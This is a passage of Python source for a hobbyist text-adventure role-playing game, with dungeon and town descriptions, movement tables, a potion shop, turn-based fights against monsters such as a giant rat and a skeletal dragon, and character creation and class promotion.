\"Dreadful Tunnels\": \"A grand fallen temple in a gloomy grove marks the entrance to this dungeon.\\n[Riverside, Entrance]\",\n \"Shadowed Dungeon\": \"A wide worn statue in a somber boulder field marks the entrance to this dungeon.\\n[Kingston]\",\n \"Lifeless Labyrinth\": \"A tall broken statue in a misty woodlands marks the entrance to this dungeon.\\n[Oakland]\",\n \"Crypt of the Conquered King\": \"A Magic Veil was lifted, so now the entrance is revealed. \\nA huge ancient monument of a dragon is the entrance to this dungeon.\\n[Forrest1, Forrest3, Enterance]\",\n \"Forrest2\": \"There is a weird magical veil here. You can tell that it is close to being shattered. You can't tell exactly where the magic is at, or where it's coming from.\",\n \"Road1\": \"It is sort of peaceful, nothing really happens close to towns.\\n[Road2, name of last town]\",\n \"Road2\": \"You hear birds, squirrels, and other wildlife. Nothing should happen on a road anyway. You come to a place where a small fire is on the side of the road with a man, and woman. They wave at you and say to be careful. You never know what could happen.\\n[Road1, Road3]\",\n \"Road3\": \"It is sort of peaceful, nothing really happens close to towns.[Road2, name of next town]\",\n}\n\nforrest = {\n 1: \"As you walk through the path, you have a feeling of being watched. You start to hear the leaves near you crackle. As you hear this, a squirrel pops out and scurries across the path.\",\n 2: \"As you are walking, you hear leaves in the trees to your right. The birds are singing, and flowers are blooming. On days like this. People like you. Shouldn't be adventuring, it is so nice outside.\",\n 3: \"You notice to your right a small clearing for a camp. There is a small tent there. As you pass by, a goblin comes out and attacks.\",\n 4: \"On your way, you notice a patch of grass in your way, and hear a small cry coming from it. As you travel through it, you are attacked by a few slimes.\",\n}\n\n\nmvmt = [\n (\"Waverly\", \"Road1\"),\n (\"Waverly\", \"Forrest1\"),\n (\"Waverly\", \"Jagged Tombs\"),\n (\"Riverside\", \"Dreadful Tunnels\"),\n (\"Riverside\", \"Road1\"),\n (\"Riverside\", \"Forrest1\"),\n (\"Oakland\", \"Road1\"),\n (\"Oakland\", \"Forrest1\"),\n (\"Oakland\", \"Lifeless Labyrinth\"),\n (\"Kingston\", \"Road1\"),\n (\"Kingston\", \"Forrest1\"),\n (\"Kingston\", \"Shadowed Dungeon\"),\n (\"Road1\", \"Road2\"),\n (\"Road1\", \"Waverly\"),\n (\"Road1\", \"Riverside\"),\n (\"Road1\", \"Oakland\"),\n (\"Road1\", \"Kingston\"),\n (\"Forrest1\", \"Forrest2\"),\n (\"Forrest1\", \"Waverly\"),\n (\"Forrest1\", \"Riverside\"),\n (\"Forrest1\", \"Oakland\"),\n (\"Forrest1\", \"Kingston\"),\n ('Forrest2', 'Forrest1'),\n ('Forrest2', 'Forrest3'),\n (\"Road3\", \"Road2\"),\n (\"Road3\", \"Waverly\"),\n (\"Road3\", \"Riverside\"),\n (\"Road3\", \"Oakland\"),\n (\"Road3\", \"Kingston\"),\n (\"Forrest3\", \"Forrest2\"),\n (\"Forrest3\", \"Waverly\"),\n (\"Forrest3\", \"Riverside\"),\n (\"Forrest3\", \"Oakland\"),\n (\"Forrest3\", \"Kingston\"),\n (\"Road2\", \"Road3\"),\n (\"Road2\", \"Road1\"),\n ('Crypt of the Conquered King', 'Forrest1'),\n ('Crypt of the Conquered King', 'Forrest3'),\n (\"Jagged Tombs\", \"Waverly\"),\n (\"Dreadful Tunnels\", \"Riverside\"),\n (\"Lifeless Labyrinth\", \"Oakland\"),\n (\"Shadowed Dungeon\", \"Kingston\"),\n]\n\ndreadfull_tunn_des = {\n \"Entrance\": \"Beyond the fallen temple lies a small, dank room. It's covered in broken pottery, dirt and broken stone. Your torch allows you to see broken mining equipment, tattered and spoiled by time itself. Further ahead are three paths, and the left is a dead end. \\n[Hall1, Hall2, Exit]\",\n \"Hall1\": 'It is a small hallway with one room at the end of it. The door says \"tokeq\" \\n[Entrance, Room1]',\n \"Hall2\": 'It is a small hallway with one room at the end of it. The door says \"tokeq\" \\n[Entrance, Room2, Room3]',\n \"Hall3\": 'It is a small hallway with one room at the end of it. The door says \"tokeq\" \\n[Room2, Room1]',\n \"Room1\": \"You enter a semi dark area. The floor is cracked and broken in spots. \\n[Hall3, Hall2]\",\n \"Room2\": \"This room is a small room with barren walls. The walls look like they have had oil on them for a while. There is one table in the room with an old paper dating 987 on it. There is nothing else in the room.\\n[Hall2, Hall3]\",\n \"Room3\": \"It is a small humid room. You notice there is water running up the wall, Not down like you would expect. \\n[Hall2]\",\n \"Room4\": \"You enter a humid area. Piles and piles of gold lie in the center, several skeletons lie next to it. \\n[Hall5, Hall2]\",\n \"Hall5\": \"This hallway is decorated in small nests, large nests, and one huge nest. At a few points in the hall, you can tell where some rooms or hallways were, but the roof is caved in at those places. There are a few rooms and a hallway. \\n[Room4, Hall4, Room5, Hall6, Room9]\",\n \"Hall4\": \"This is a small hallway leading to a small room.[Hall5, Room7]\",\n \"Room 7\": \"The room is small, as it looks like an abandoned labratory.[Hall4]\",\n \"Room5\": \"This is a small room, you can see that the papers and books are all from a previous era.\\n[Hall5]\",\n \"Hall6\": \"It is a small hallway with torches on the sides.\\n[Hall5, Room6]\",\n \"Room6\": \"A small room with standing water. As you enter, small mice scurry around.\\n[Hall6, Hall7]\",\n \"Hall7\": \"The small hallway splits off into two paths. One however, is blocked off by debris.\\n[Room6, Hall8]\",\n \"Hall8\": \"The small hallway is leading into a small room\\n[Room9, Hall7]\",\n \"Room9\": \"You eventually make it to what is likely the final room. A huge wooden door blocks your path. Various odd symbols are all over it, somehow untouched by time and the elements. You step closer to inspect it and.. wait.. you hear a loud bang in the distance from which you came. Out of panic, you turn around to claw at the doors to find that they are now wide open. You enter.\",\n \"BossRoom\": \"The doors slam shut behind you. \\nThe room is huge and lined with nests small, large, huge, and one big enough to fit an elephant. You hear a loud sound, resembling a rat, from above. As you hear this, a rat the size of a car falls from the ceiling.\",\n}\n\ndreadfull_tunnels:List[Tuple] = [\n (\"Entrance\", \"Exit\"),\n (\"Entrance\", \"Hall1\"),\n (\"Entrance\", \"Hall2\"),\n (\"Hall1\", \"Entrance\"),\n (\"Hall1\", \"Room1\"),\n (\"Hall2\", \"Entrance\"),\n (\"Hall2\", \"Room2\"),\n (\"Hall2\", \"Room3\"),\n (\"Hall3\", \"Room1\"),\n (\"Hall3\", \"Room2\"),\n (\"Hall4\", \"Hall5\"),\n (\"Hall4\", \"Room7\"),\n (\"Hall5\", \"Room4\"),\n (\"Hall5\", \"Hall4\"),\n (\"Hall5\", \"Room5\"),\n (\"Hall5\", \"Hall6\"),\n (\"Hall5\", \"Room9\"),\n (\"Hall6\", \"Hall5\"),\n (\"Hall6\", \"Room6\"),\n (\"Hall7\", \"Room6\"),\n (\"Hall7\", \"Hall8\"),\n (\"Hall8\", \"Room9\"),\n (\"Hall8\", \"Hall7\"),\n (\"Room1\", \"Hall3\"),\n (\"Room1\", \"Hall2\"),\n (\"Room2\", \"Hall2\"),\n (\"Room2\", \"Hall3\"),\n (\"Room3\", \"Hall2\"),\n (\"Room4\", \"Hall5\"),\n (\"Room4\", \"Hall6\"),\n (\"Room5\", \"Hall5\"),\n (\"Room6\", \"Hall6\"),\n (\"Room7\", \"Hall7\"),\n (\"Room9\", \"BossRoom\"),\n (\"BossRoom\", \"Exit\"),\n]\n\n\nBossDungeonMvmt = {\n 'Entrance': \"A Magic Veil was lifted, so now the entrance is revealed. \\nA huge ancient monument of a dragon is the entrance to this dungeon. \\nAs you pass the monument, it looks at you and roars. It then goes back to being a monument.\\n[Room1, Exit]\",\n 'Room1': 'The room is a small entrance room. The small doors look to be that of dwarven status. The floor and walls seem to be stone that has been there since the time of the Gods. You see farther in that there are two paths with rooms on the end of them. One path is blocked by iron bars. In the center, you see a slot for mail, a place to open and shoot arrows from, and a place at the bottom for sliding small sacks of food through.\\n[Entrance, Room2]',\n 'Room2': 'In the center of the room, there is a table with small health and mana potions. You think to yourself that it would be a waste to leave them, so you take them.\\n[Room1, Room3]',\n 'Room3': 'This room is a large, rounded, hallway room. If you do not know what a rounded hallway room is, it is a circular hallway that has a room in the very center. There are two chests in this room with a key two large health potions, a mana potion, and a few pieces of gold.\\n\\nYou take the gold, key, and potions.[Room5, Room4, Room8, Hall1, Room2]',\n 'Hall1': 'This hallway is small and round. It leads to a small room that is empty with a large chasm opened up at the end below a crack. Past the crack, is a room with a chest that looks like it has not been touched in years.\\n[Room7, Room3]',\n 'Room7': 'As you jump across the chasm, you hear a loud roar below as fire and smoke come up from the chasm. After a few seconds, the smoke disapates. The chest contains a pile of gold and a weird looking key.\\n[Hall1]',\n 'Room4': 'In this room, there are just empty boxes and crates. There are also tables and chairs.\\n[Room3]',\n 'Room5': 'The room has a square hole in the center. It leads down to the chasm below. Around it and on the ceiling, you can see burn marks and soot.\\n[Room3]',\n 'Room8': 'In this room, you see stairs leading to the chasm below.\\n[Chasm, Room3]',\n 'Chasm': \"As you decend the stairs, you see a huge dragon skeleton. The skeleton looks like it hasn't been touched in hundreds of years. You do notice a small mark on the skull. You go closer to look at it, and as you do, the dragon skeleton risies and roars.\"\n}\n\nshop_inv = [\n \"1 Health Potion\",\n \"3 Health Potions\",\n \"5 Health Potions\",\n \"7 Health Potions\",\n \"1 Mana Potion\",\n \"3 Mana Potions\",\n \"5 Mana Potions\",\n \"7 Mana Potions\",\n \"Short Sword\",\n \"Claymore\"\n]\nshop_price = [20,35,75,100,20,35,75,100,20,30]\n\n\ndef shop(player:Player) -> None:\n i=0\n print(\"Welcome to the shop.\\n\\n\")\n for l,r in zip(shop_inv, shop_price):\n print(l,r)\n buy=input(\"> \").title()\n for item in shop_inv:\n if item == buy:\n if player.gold>=shop_price[i]:\n if buy == \"1 Health Potion\":\n player.health_potion += 1\n elif buy == \"3 Health Potions\":\n player.health_potion += 3\n elif buy == \"5 Health Potions\":\n player.health_potion += 5\n elif buy == \"7 Health Potions\":\n player.health_potion += 7\n elif buy == \"1 Mana Potion\":\n player.mana_potion += 1\n elif buy == \"3 Mana Potions\":\n player.mana_potion += 3\n elif buy == \"5 Mana Potions\":\n player.mana_potion += 5\n elif buy == \"7 Mana Potions\":\n player.mana_potion += 7\n elif buy == \"Short Sword\":\n player.inventory.append(\"Short Sword\")\n elif buy == \"Claymore\":\n player.inventory.append(\"Claymore\")\n else:\n print('popsicle')\n else:\n print(\"You don't have enough gold.\")\n print(\"We don't have that here.\")\n\nBoss_val:List[Tuple] = [\n ('Entrance', 'Room1'),\n ('Room1', 'Entrance'),\n ('Room1', 'Room2'),\n ('Room2', 'Room3'),\n ('Room2', 'Room1'),\n ('Room3', 'Room2'),\n ('Room3', 'Room4'),\n ('Room3', 'Room5'),\n ('Room3', 'Hall1'),\n ('Room3', 'Room8'),\n ('Hall1', 'Room7'),\n ('Hall1', 'Room3'),\n ('Room8', 'Chasm'),\n ('Room2', 'Room3'),\n ('Room4', 'Room3'),\n ('Room5', 'Room3'),\n ('Room8', 'Room3'),\n ('Entrance', 'Exit'),\n ('Room7', 'Hall1')\n\n]\n\ndef use_potion(player: Player) -> None:\n print(\"\\nDo you want to use a [Health Potion] or [Mana Potion]?\")\n action = input(\"> \").title()\n if player.health_potion == 0 and player.mana_potion == 0:\n print(\"You have no potions.\")\n elif action == \"Health Potion\":\n print(\"You drink a health potion, and recovered 30 health!\")\n player.health += 30\n player.health_potion -= 1\n elif action == \"Mana Potion\":\n print(\"You drink a mana potion, and recovered 30 mana!\")\n player.mana += 30\n player.mana_potion -= 1\n\ndef DragonFight(player: Player) -> None:\n print(\n \"As you walk into the room, you see something move. You prepare your weapon just in case but are forced to dodge as a fireball lands right where you were. Standing back up, you see what the monster is. A skeletal dragon that is ready to attack!\"\n )\n monsterhp = 300\n monster = \"Skeletal Dragon\"\n while monsterhp > 0 and player.health > 0:\n print(f\"Player Health: {player.health}\")\n print(f\"Player Mana: {player.mana}\")\n print(f\"Monster Health: {monsterhp}\")\n if player.p_class == \"Knight\":\n move = input(\n \"\\nDo you want to [Attack], use a [Sword Skill], or use a [Potion]? \"\n ).title()\n if move == \"Sword Skill\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Sword Skill\":\n print(player.skills)\n skill = sword_skill_input()\n if skill in player.skills:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"You used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(20,40)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n elif player.p_class == \"Mage\":\n print(\"Do you want to [Attack], use a [Spell], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Spell\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Spell\":\n print(player.skills)\n spell = spell_input()\n if spell in player.skills:\n player_damage = skill_damage[spell]\n monsterhp -= player_damage\n print(f\"You used {spell}, it does {player_damage} damage.\")\n player.mana -= skill_cost[spell]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8, 16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n if player.health < 0:\n break\n elif player.p_class == \"Rogue\":\n print(\"Do you want to [Attack], use a [Skill], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Skill\":\n print(player.skills)\n skill = rogue_input()\n if skill in player.skills:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8,16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n player.xp += 60\n player.gold += 250\n player.end='END'\n\n\n\ndef BossFight(player: Player) -> None:\n monsterhp = 150\n monster = \"Giant Rat\"\n while monsterhp > 0 and player.health > 0:\n print(f\"Player Health: {player.health}\")\n print(f\"Player Mana: {player.mana}\")\n print(f\"Monster Health: {monsterhp}\")\n if player.p_class == \"Knight\":\n move = input(\n \"\\nDo you want to [Attack], use a [Sword Skill], or use a [Potion]? \"\n ).title()\n if move == \"Sword Skill\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Sword Skill\":\n print(player.skills)\n skill = sword_skill_input()\n if skill in player.skills:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"You used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8, 16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n elif player.p_class == \"Mage\":\n print(\"Do you want to [Attack], use a [Spell], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Spell\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Spell\":\n print(player.skills)\n spell = spell_input()\n if spell in player.skills:\n player_damage = skill_damage[spell]\n monsterhp -= player_damage\n print(f\"You used {spell}, it does {player_damage} damage.\")\n player.mana -= skill_cost[spell]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8, 16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n if player.health < 0:\n break\n elif player.p_class == \"Rogue\":\n print(\"Do you want to [Attack], use a [Skill], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Skill\":\n print(player.skills)\n skill = rogue_input()\n if skill in player.skills:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(8,16)\n print(\n f\"\\nIt is now the {monster}'s turn.\\nThe {monster} attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n player.xp += 40\n player.gold += 180\n\ndef skeletonfight(player: Player) -> None:\n print(\"As you go to take the gold, a skeleton jumps out and attacks!\")\n monsterhp = 60\n monster = \"Skeleton\"\n while monsterhp > 0 and player.health > 0:\n print(f\"Player Health: {player.health}\")\n print(f\"Player Mana: {player.mana}\")\n print(f\"{monster} Health: {monsterhp}\")\n if player.p_class == \"Knight\":\n move = input(\n \"\\nDo you want to [Attack], use a [Sword Skill], or use a [Potion]? \"\n ).title()\n if move == \"Sword Skill\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Sword Skill\":\n print(player.skills)\n skill = sword_skill_input()\n if skill in player.skills:\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n else:\n print(\"You missed!\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = weapons[player.curr_weapon]\n print(f\"You used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n else:\n print(\"You missed!\")\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(1, 8)\n print(\n f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n elif player.p_class == \"Mage\":\n print(\"Do you want to [Attack], use a [Spell], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Spell\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Spell\":\n print(player.skills)\n spell = spell_input()\n if spell in player.skills:\n if player.mana < skill_cost[spell]:\n print(\"You have no mana and failed to attack!\")\n else:\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = skill_damage[spell]\n monsterhp -= player_damage\n print(f\"You used {spell}, it does {player_damage} damage.\")\n player.mana -= skill_cost[spell]\n else:\n print(\"\\nYou missed!\")\n player.mana -= skill_cost[spell]\n elif move == \"Attack\":\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n else:\n print(\"\\nYou missed!\")\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(1, 8)\n print(\n f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n if player.health < 0:\n break\n elif player.p_class == \"Rogue\":\n print(\"Do you want to [Attack], use a [Skill], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Skill\":\n print(player.skills)\n skill = rogue_input()\n if skill in player.skills:\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n else:\n print(\"You missed!\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n else:\n print(\"You missed!\")\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(1, 8)\n print(\n f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n player.xp += 15\n player.gold += 30\n\ndef BossDun(player: Player, location: str) -> None:\n location='Entrance'\n print(BossDungeonMvmt[\"Entrance\"])\n while player.health > 0:\n if location == \"Exit\":\n location == \"Forrest2\"\n break\n else:\n goto = input(\"> \").title()\n if (location, goto) in Boss_val:\n location = goto\n if location=='Exit':\n location==\"Forrest1\"\n break\n elif location == \"Chasm\":\n print(BossDungeonMvmt['Chasm'])\n DragonFight(player)\n break\n else:\n print(BossDungeonMvmt[goto])\n \n else:\n print(\"You cannot go there.\")\n\ndef DreadTun(player: Player, location: str) -> None:\n location='Entrance'\n print(dreadfull_tunn_des[\"Entrance\"])\n while player.health > 0:\n if location == \"Exit\":\n location == \"Dreaded Tunnels\"\n break\n else:\n goto = input(\"> \").title()\n if (location, goto) in dreadfull_tunnels:\n location = goto\n print(dreadfull_tunn_des[goto])\n if random_encounter():\n combat(player)\n elif location == \"Room4\":\n print(dreadfull_tunn_des[\"Room4\"])\n act = input(\"Do you want to take the gold? [Y/N]\\n> \").title()\n if act == \"Y\":\n skeletonfight(player)\n if player.health <= 0:\n break\n else:\n player.gold += 125\n elif location == \"BossRoom\":\n BossFight(player)\n player.orb += 1\n else:\n print(\"You cannot go there.\")\n\n\ndef mov_val(location: str, goto: str) -> bool:\n return (location, goto) in mvmt\n\n\ndef move(location: str, player: Player) -> str:\n while True:\n goto = input(\"Where would you like to go?> \").title()\n if location == \"Dreadful Tunnels\" and goto == \"Entrance\":\n DreadTun(player, location)\n elif goto==\"Forrest2\" and player.orb==1:\n location='Crypt of the Conquered King'\n print(towns['Crypt of the Conquered King'])\n BossDun(player, location)\n break\n elif location==\"Forrest2\" and goto == \"Entrance\":\n BossDun(player, location)\n break\n elif goto == \"Forrest1\" or goto == \"Forrest3\":\n if mov_val(location, goto):\n forrest1 = random.randint(1, 4)\n forrest3 = random.randint(1, 4)\n if goto == \"Forrest1\":\n location = goto\n print(forrest[forrest1])\n break\n\n else:\n location = goto\n print(forrest[forrest3])\n break\n\n elif (location == \"Road1\" or location == \"Road3\") and mov_val(location, goto):\n if goto == \"Road2\":\n print(towns[goto])\n location = goto\n break\n elif location == \"Road1\" and goto == player.sideloc:\n print(towns[goto])\n location = goto\n break\n else:\n if player.sideloc == \"Waverly\":\n if goto == \"Kingston\" or goto == \"Oakland\":\n location = goto\n player.sideloc=goto\n print(towns[goto])\n break\n else:\n print(\n f\"You cannot goto {goto} from {location} coming from {player.sideloc}\"\n )\n break\n elif player.sideloc == \"Oakland\":\n if goto == \"Riverside\" or goto == \"Waverly\":\n location = goto\n player.sideloc=goto\n print(towns[goto])\n break\n else:\n print(\n f\"You cannot goto {goto} from {location} coming from {player.sideloc}\"\n )\n break\n elif player.sideloc == \"Riverside\":\n if goto == \"Kingston\" or goto == \"Oakland\":\n location = goto\n player.sideloc=goto\n print(towns[goto])\n break\n else:\n print(\n f\"You cannot goto {goto} from {location} coming from {player.sideloc}\"\n )\n break\n else:\n if goto == \"Riverside\" or goto == \"Waverly\":\n location = goto\n player.sideloc=goto\n print(towns[goto])\n break\n else:\n print(\n f\"You cannot goto {goto} from {location} coming from {player.sideloc}\"\n )\n break\n elif mov_val(location, goto):\n location = goto\n print(towns[goto])\n break\n else:\n print(f\"You cannot goto {goto} from {location}.\")\n break\n return location\n\ndef level_up(player: Player) -> None:\n player.level += 1\n player.max_health += 25\n player.max_mana += 25\n player.health = player.max_health\n player.mana = player.max_mana\n player.xp -= 100\n print(\"You have leveled up! Congratulations!\")\n print(f\"Player Level: {player.level}\")\n print(f\"Max Health: {player.max_health}\")\n print(f\"Max Mana: {player.max_mana}\")\n\ndef char_create(player: Player) -> None:\n while True:\n player.inventory = [\"Rusted Sword\", \"God Sword\"]\n print(\"Please create your character.\")\n player.name = input(\"Name: \")\n player.p_class = input(\"Pick Mage, Knight, or Rogue: \").title()\n ()\n if player.p_class == \"Mage\":\n player.health = 60\n player.mana = 100\n player.max_health = 60\n player.max_mana = 100\n player.skills = [\"Fireball\", \"Lunar Tempest\", \"Soul Rain\"]\n break\n elif player.p_class == \"Knight\":\n player.health = 100\n player.mana = 60\n player.max_health = 100\n player.max_mana = 60\n player.skills = [\"Vertical Arc\", \"Howling Octave\", \"Deadly Sins\"]\n break\n elif player.p_class == \"Rogue\":\n player.health = 75\n player.mana = 75\n player.max_health = 75\n player.max_mana = 75\n player.skills = [\"Long Shot\", \"Sneak Attack\", \"Sinister Strike\"]\n break\n else:\n print(\"That is not a valid input\")\n\n\ndef random_encounter() -> bool:\n encounter = random.randint(1, 5)\n if encounter == 1 or encounter == 2:\n return True\n else:\n return False\n\n\ndef random_mon() -> int:\n monster = random.randint(1, 4)\n return monster\n\n\ndef spell_input() -> str:\n spell = input(\"What spell do you want to cast? >\").title()\n return spell\n\n\ndef rogue_input() -> str:\n skill = input(\"What skill do you want to use? >\").title()\n return skill\n\n\ndef sword_skill_input() -> str:\n skill = input(\"Which sword skill would you like to use? \").title()\n return skill\n\ndef promotion(player: Player) -> None:\n print(\"You have reached level 10! You can now pick an advanced class.\")\n if player.p_class == \"Knight\":\n print(\"As a Knight, you can go into Paladin or Barbarian. As a Barbarian, you lose mana and gain an enourmous amount of health. As a Paladin, you get a decent amount of both.\")\n while True:\n act = input(\"Which one do you want? > \").title()\n if act == \"Barbarian\":\n player.max_health += 160\n player.max_mana -= 40\n player.advanced_class = \"Barbarian\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n elif act == \"Paladin\":\n player.max_health += 60\n player.max_mana += 60\n player.advanced_class = \"Paladin\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n elif player.p_class == \"Mage\":\n print(\"As a Mage, you can go into Grandmaster or Battlemage. As a Grandmaster, you gain a lot of mana but gain a slight amount of health. As a Battlemage, you get a decent amount of both.\")\n while True:\n act = input(\"Which one do you want? > \").title()\n if act == \"Grandmaster\":\n player.max_health += 20\n player.max_mana += 100\n player.advanced_class = \"Grandmaster\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n elif act == \"Battlemage\":\n player.max_health += 60\n player.max_mana += 60\n player.advanced_class = \"Battlemage\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n else:\n print(\"As a Rogue, you can go into Assassin or Pirate. As an Assassin, you gain a moderate amount of health and mana. As a Pirate, you gain a good amount of health and a slight amount of mana.\")\n while True:\n act = input(\"Which one do you want? > \").title()\n if act == \"Assassin\":\n player.max_health += 60\n player.max_mana += 60\n player.advanced_class = \"Assassin\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n elif act == \"Pirate\":\n player.max_health += 80\n player.max_mana += 40\n player.advanced_class = \"Pirate\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n\n\ndef combat(player: Player) -> None:\n random_mon()\n monsterhp = 70\n mon = random_mon()\n if mon == 1:\n monster = \"slime\"\n elif mon == 2:\n monster = \"goblin\"\n elif mon == 3:\n monster = \"skeleton\"\n elif mon == 4:\n monster = \"bandit\"\n print(f\"You are fighting a {monster}\")\n while monsterhp > 0 and player.health > 0:\n print(f\"Player Health: {player.health}\")\n print(f\"Player Mana: {player.mana}\")\n print(f\"{monster} Health: {monsterhp}\")\n if player.p_class == \"Knight\":\n move = input(\n \"\\nDo you want to [Attack], use a [Sword Skill], or use a [Potion]? \"\n ).title()\n if move == \"Sword Skill\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Sword Skill\":\n print(player.skills)\n skill = sword_skill_input()\n if skill in player.skills:\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n else:\n print(\"You missed!\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = weapons[player.curr_weapon]\n print(f\"You used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n else:\n print(\"You missed!\")\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(1, 8)\n print(\n f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n elif player.p_class == \"Mage\":\n print(\"Do you want to [Attack], use a [Spell], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Spell\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Spell\":\n print(player.skills)\n spell = spell_input()\n if spell in player.skills:\n if player.mana < skill_cost[spell]:\n print(\"You have no mana and failed to attack!\")\n else:\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = 